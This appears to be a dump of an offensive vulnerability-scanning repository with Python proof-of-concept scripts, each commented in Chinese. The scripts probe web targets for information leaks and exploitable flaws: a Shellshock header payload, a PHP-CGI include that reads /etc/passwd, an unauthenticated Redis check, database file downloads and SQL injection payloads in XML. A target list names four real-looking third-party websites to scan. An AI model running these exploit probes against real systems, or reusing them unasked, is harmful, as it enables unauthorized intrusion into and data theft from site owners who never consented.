9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class sgc8000_deldata_config_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/app/deletessdata/config/deldata_config.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml" and r"databasesetup" in req.text:
27 | cprint("[+]存在sgc8000 监控系统数据连接信息泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = sgc8000_deldata_config_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/industrial/sgc8000_sg8k_sms_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: sgc8000 大型旋转机监控系统报警短信模块泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0135197
6 | author: Lucifer
7 | description: 访问/sg8k_sms,未授权获取监控系统报警信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class sgc8000_sg8k_sms_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/sg8k_sms"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"SG8000" in req.text and r"getMachineList" in req.text and r"cancelSendMessage" in req.text:
27 | cprint("[+]存在sgc8000 大型旋转机监控系统报警短信模块泄露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = sgc8000_sg8k_sms_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/information/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/information/__init__.py
--------------------------------------------------------------------------------
/pocs/information/apache_server_status_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: apache server-status信息泄露
5 | referer: unknown
6 | author: Lucifer
7 | description: apache的状态信息文件泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class apache_server_status_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/server-status"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"Server uptime" in req.text and r"Server Status" in req.text and req.status_code==200:
27 | cprint("[+]存在git源码泄露漏洞...(低危)\tpayload: "+vulnurl, "green")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = apache_server_status_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/information/crossdomain_find.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: crossdomain.xml文件发现
5 | referer: unknown
6 | author: Lucifer
7 | description: crossdomain错误配置可导致。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class crossdomain_find_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/crossdomain.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"" in req.text and r"allow-access-from" in req.text:
27 | cprint("[+]存在crossdomain.xml文件发现漏洞...(信息)\tpayload: "+vulnurl, "green")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = crossdomain_find_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/information/git_check.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: git源码泄露扫描
5 | referer: unknown
6 | author: Lucifer
7 | description: 忘记了删除.git目录而导致的漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class git_check_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/.git/config"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"repositoryformatversion" in req.text and req.status_code==200:
27 | cprint("[+]存在git源码泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = git_check_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/information/informationmain.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: information漏洞库
5 | referer: unknow
6 | author: Lucifer
7 | description: 包含所有information漏洞类型,封装成一个模块
8 | '''
9 | from information.springboot_api import springboot_api_BaseVerify
10 | from information.options_method import options_method_BaseVerify
11 | from information.robots_find import robots_find_BaseVerify
12 | from information.git_check import git_check_BaseVerify
13 | from information.jsp_conf_find import jsp_conf_find_BaseVerify
14 | from information.svn_check import svn_check_BaseVerify
15 | from information.jetbrains_ide_workspace_disclosure import jetbrains_ide_workspace_disclosure_BaseVerify
16 | from information.apache_server_status_disclosure import apache_server_status_disclosure_BaseVerify
17 | from information.crossdomain_find import crossdomain_find_BaseVerify
--------------------------------------------------------------------------------
/pocs/information/jsp_conf_find.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: java配置文件文件发现
5 | referer: unknow
6 | author: Lucifer
7 | description: web.xml是java框架使用的配置文件,可以获取敏感信息
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class jsp_conf_find_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/WEB-INF/web.xml"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 | if req.headers["Content-Type"] == "application/xml":
24 | cprint("[+]存在web.xml配置文件...(敏感信息)\tpayload: "+vulnurl, "green")
25 |
26 | except:
27 | cprint("[-] "+__file__+"====>连接超时", "cyan")
28 |
29 | if __name__ == "__main__":
30 | warnings.filterwarnings("ignore")
31 | testVuln = jsp_conf_find_BaseVerify(sys.argv[1])
32 | testVuln.run()
33 |
--------------------------------------------------------------------------------
/pocs/information/options_method.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: options方法开启
5 | referer: unknow
6 | author: Lucifer
7 | description: robots.txt是爬虫标准文件,可从文件里找到屏蔽了哪些爬虫搜索的目录
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class options_method_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | vulnurl = self.url
23 | try:
24 | req = requests.options(vulnurl, headers=headers, timeout=10, verify=False)
25 |
26 | if r"OPTIONS" in req.headers['Allow']:
27 | cprint("[+]存在options方法开启...(敏感信息)"+"\tpayload: "+vulnurl+"\tAllow:"+req.headers['Allow'], "green")
28 | except:
29 | cprint("[-] "+__file__+"====>连接超时", "cyan")
30 |
31 | if __name__ == "__main__":
32 | warnings.filterwarnings("ignore")
33 | testVuln = options_method_BaseVerify(sys.argv[1])
34 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/information/robots_find.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: robots文件发现
5 | referer: unknow
6 | author: Lucifer
7 | description: robots.txt是爬虫标准文件,可从文件里找到屏蔽了哪些爬虫搜索的目录
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class robots_find_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/robots.txt"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if "Disallow" in req.text:
25 | cprint("[+]存在robots.txt爬虫文件...(敏感信息)"+"\tpayload: "+vulnurl, "green")
26 | except:
27 | cprint("[-] "+__file__+"====>连接超时", "cyan")
28 |
29 | if __name__ == "__main__":
30 | warnings.filterwarnings("ignore")
31 | testVuln = robots_find_BaseVerify(sys.argv[1])
32 | testVuln.run()
33 |
--------------------------------------------------------------------------------
/pocs/information/springboot_api.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: spring boot 路径泄露
5 | referer: http://blog.csdn.net/u011687186/article/details/73457498
6 | author: Lucifer
7 | description: robots.txt是爬虫标准文件,可从文件里找到屏蔽了哪些爬虫搜索的目录
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class springboot_api_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/mappings"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if "resourceHandlerMapping" in req.text and r"springframework.boot.actuate" in req.text:
25 | cprint("[+]存在spring boot api路径泄露...(敏感信息)"+"\tpayload: "+vulnurl, "green")
26 | except:
27 | cprint("[-] "+__file__+"====>连接超时", "cyan")
28 |
29 | if __name__ == "__main__":
30 | warnings.filterwarnings("ignore")
31 | testVuln = springboot_api_BaseVerify(sys.argv[1])
32 | testVuln.run()
33 |
--------------------------------------------------------------------------------
/pocs/system/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/__init__.py
--------------------------------------------------------------------------------
/pocs/system/bash/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/bash/__init__.py
--------------------------------------------------------------------------------
/pocs/system/bash/shellshock.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shellshock漏洞
5 | referer: http://drops.wooyun.org/papers/3268
6 | author: Lucifer
7 | description: 在bash 1.14至bash 4.3的Linux/Unix系统版本中,bash在处理某些构造的环境变量时存在安全漏洞,
8 | 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统
9 | '''
10 | import sys
11 | import warnings
12 | import requests
13 | from termcolor import cprint
14 |
15 | class shellshock_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-agent":'() { :;}; echo \"Shellshock: Server Vulnerable\"',
22 | "Accept":"text/plain",
23 | "Content-type":"application/x-www-form-urlencoded"
24 | }
25 | payload = ""
26 | vulnurl = self.url + payload
27 | try:
28 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
29 |
30 | if r"Shellshock" in req.headers:
31 | cprint("[+]存在shellshock漏洞...(高危)\tpayload: "+vulnurl, "red")
32 | except:
33 | cprint("[-] "+__file__+"====>连接超时", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = shellshock_BaseVerify(sys.argv[1])
38 | testVuln.run()
39 |
--------------------------------------------------------------------------------
/pocs/system/couchdb/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/couchdb/__init__.py
--------------------------------------------------------------------------------
/pocs/system/dorado/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/dorado/__init__.py
--------------------------------------------------------------------------------
/pocs/system/glassfish/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/glassfish/__init__.py
--------------------------------------------------------------------------------
/pocs/system/goahead/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/goahead/__init__.py
--------------------------------------------------------------------------------
/pocs/system/goahead/bin/goahead_payload.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/goahead/bin/goahead_payload.so
--------------------------------------------------------------------------------
/pocs/system/hfs/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/hfs/__init__.py
--------------------------------------------------------------------------------
/pocs/system/hudson/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/hudson/__init__.py
--------------------------------------------------------------------------------
/pocs/system/hudson/hudson_ws_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: hudson源代码泄露漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0103484
6 | author: Lucifer
7 | description: 一种新型的漏洞Hudson利用方式,不用破解密码,不用代码执行,直接查看任意代码。访问项目页面访问不到源代码,我们后面直接加入/ws/即可访问和下载所有代码。
8 | '''
9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 |
14 | class hudson_ws_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/hudson/job/crm/ws/"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r".svn" in req.text:
27 | cprint("[+]存在hudson源代码泄露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = hudson_ws_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/system/iis/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/iis/__init__.py
--------------------------------------------------------------------------------
/pocs/system/intel/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/intel/__init__.py
--------------------------------------------------------------------------------
/pocs/system/kinggate/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/kinggate/__init__.py
--------------------------------------------------------------------------------
/pocs/system/mongodb/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/mongodb/__init__.py
--------------------------------------------------------------------------------
/pocs/system/nginx/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/nginx/__init__.py
--------------------------------------------------------------------------------
/pocs/system/others/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/others/__init__.py
--------------------------------------------------------------------------------
/pocs/system/others/forease_fileinclude_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 实易DNS管理系统文件包含至远程代码执行
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0122543
6 | author: Lucifer
7 | description: 实易智能DNS管理系统,php CGI远程代码执行,文件包含。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class forease_fileinclude_code_exec_BaseVerify():
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/index.php?-dauto_prepend_file%3d/etc/passwd"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |
27 | if r"root:" in req.text and r"/bin/bash" in req.text:
28 | cprint("[+]存在实易DNS管理系统文件包含漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = forease_fileinclude_code_exec_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/system/php/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/php/__init__.py
--------------------------------------------------------------------------------
/pocs/system/php/php_expose_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: php expose_php模块开启
5 | referer: http://blog.csdn.net/change518/article/details/39892449
6 | author: Lucifer
7 | description: 开启了expose_php模块。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class php_expose_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"XMLWriter" in req.text and r"phpinfo" in req.text:
27 | cprint("[+]存在php expose_php模块开启...(信息)\tpayload: "+vulnurl, "green")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = php_expose_disclosure_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/system/redis/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/redis/__init__.py
--------------------------------------------------------------------------------
/pocs/system/redis/redis_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: redis 未授权漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: redis无用户名密码可直接远程操纵。
8 | '''
9 | import sys
10 | import redis
11 | import warnings
12 | from termcolor import cprint
13 | from urllib.parse import urlparse
14 |
15 | class redis_unauth_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | port = 6379
21 | if r"http" in self.url:
22 | #提取host
23 | host = urlparse(self.url)[1]
24 | try:
25 | port = int(host.split(':')[1])
26 | except:
27 | pass
28 | flag = host.find(":")
29 | if flag != -1:
30 | host = host[:flag]
31 | else:
32 | host = self.url
33 |
34 | try:
35 | r = redis.Redis(host, port=port, db=0, socket_timeout=6.0)
36 | if r.ping() is True:
37 | cprint("[+]存在redis 未授权漏洞...(高危)\tpayload: "+host+":"+str(port), "red")
38 |
39 | except:
40 | cprint("[-] "+__file__+"====>连接超时", "cyan")
41 |
42 | if __name__ == "__main__":
43 | warnings.filterwarnings("ignore")
44 | testVuln = redis_unauth_BaseVerify(sys.argv[1])
45 | testVuln.run()
46 |
--------------------------------------------------------------------------------
/pocs/system/resin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/resin/__init__.py
--------------------------------------------------------------------------------
/pocs/system/sangfor/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/sangfor/__init__.py
--------------------------------------------------------------------------------
/pocs/system/smtp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/smtp/__init__.py
--------------------------------------------------------------------------------
/pocs/system/srun/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/srun/__init__.py
--------------------------------------------------------------------------------
/pocs/system/ssl/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/ssl/__init__.py
--------------------------------------------------------------------------------
/pocs/system/tomcat/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/tomcat/__init__.py
--------------------------------------------------------------------------------
/pocs/system/topsec/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/topsec/__init__.py
--------------------------------------------------------------------------------
/pocs/system/turbomail/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/turbomail/__init__.py
--------------------------------------------------------------------------------
/pocs/system/vhost/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/vhost/__init__.py
--------------------------------------------------------------------------------
/pocs/system/vhost/npoint_mdb_download.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: N点虚拟主机管理系统V1.9.6版数据库下载漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-061151
6 | author: Lucifer
7 | description: N点虚拟主机管理系统默认数据库名#host # date#196.mdb。url直接输入不行,这里替换下#->%23 空格->=,即可下载数据库文件。
8 | '''
9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 |
14 | class npoint_mdb_download_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/host_date/%23host%20%23%20date%23196.mdb"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.head(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/x-msaccess":
27 | cprint("[+]存在N点虚拟主机管理系统数据库下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = npoint_mdb_download_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/system/weblogic/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/weblogic/__init__.py
--------------------------------------------------------------------------------
/pocs/system/weblogic/weblogic_interface_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: weblogic 接口泄露
5 | referer: unknown
6 | author: Lucifer
7 | description: weblogic 接口泄露
8 | '''
9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 |
14 | class weblogic_interface_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/bea_wls_deployment_internal/DeploymentService"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False, allow_redirects=False)
26 |
27 | if req.status_code == 200:
28 | cprint("[+]存在weblogic 接口泄露漏洞...(信息)\tpayload: "+vulnurl, "green")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = weblogic_interface_disclosure_BaseVerify(sys.argv[1])
36 | testVuln.run()
37 |
--------------------------------------------------------------------------------
/pocs/system/zabbix/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/zabbix/__init__.py
--------------------------------------------------------------------------------
/pocs/system/zookeeper/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/zookeeper/__init__.py
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | requests
2 | bs4
3 | redis
4 | pexpect
5 | termcolor
6 | pymysql
7 | pymongo
8 |
--------------------------------------------------------------------------------
/scan/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/scan/__init__.py
--------------------------------------------------------------------------------
/target.txt:
--------------------------------------------------------------------------------
1 | http://www.mapintime.com/
2 | http://cms.rkang.cn/
3 | http://www.120bjgcw.com/
4 | http://www.szbaoshan.com/
--------------------------------------------------------------------------------
/xml/zfsoft_service_stryhm_sqli_false.xml:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 | jwc01'AnD'1'='2
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/xml/zfsoft_service_stryhm_sqli_true.xml:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 | jwc01'AnD'1'='1
11 | a
12 | a
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------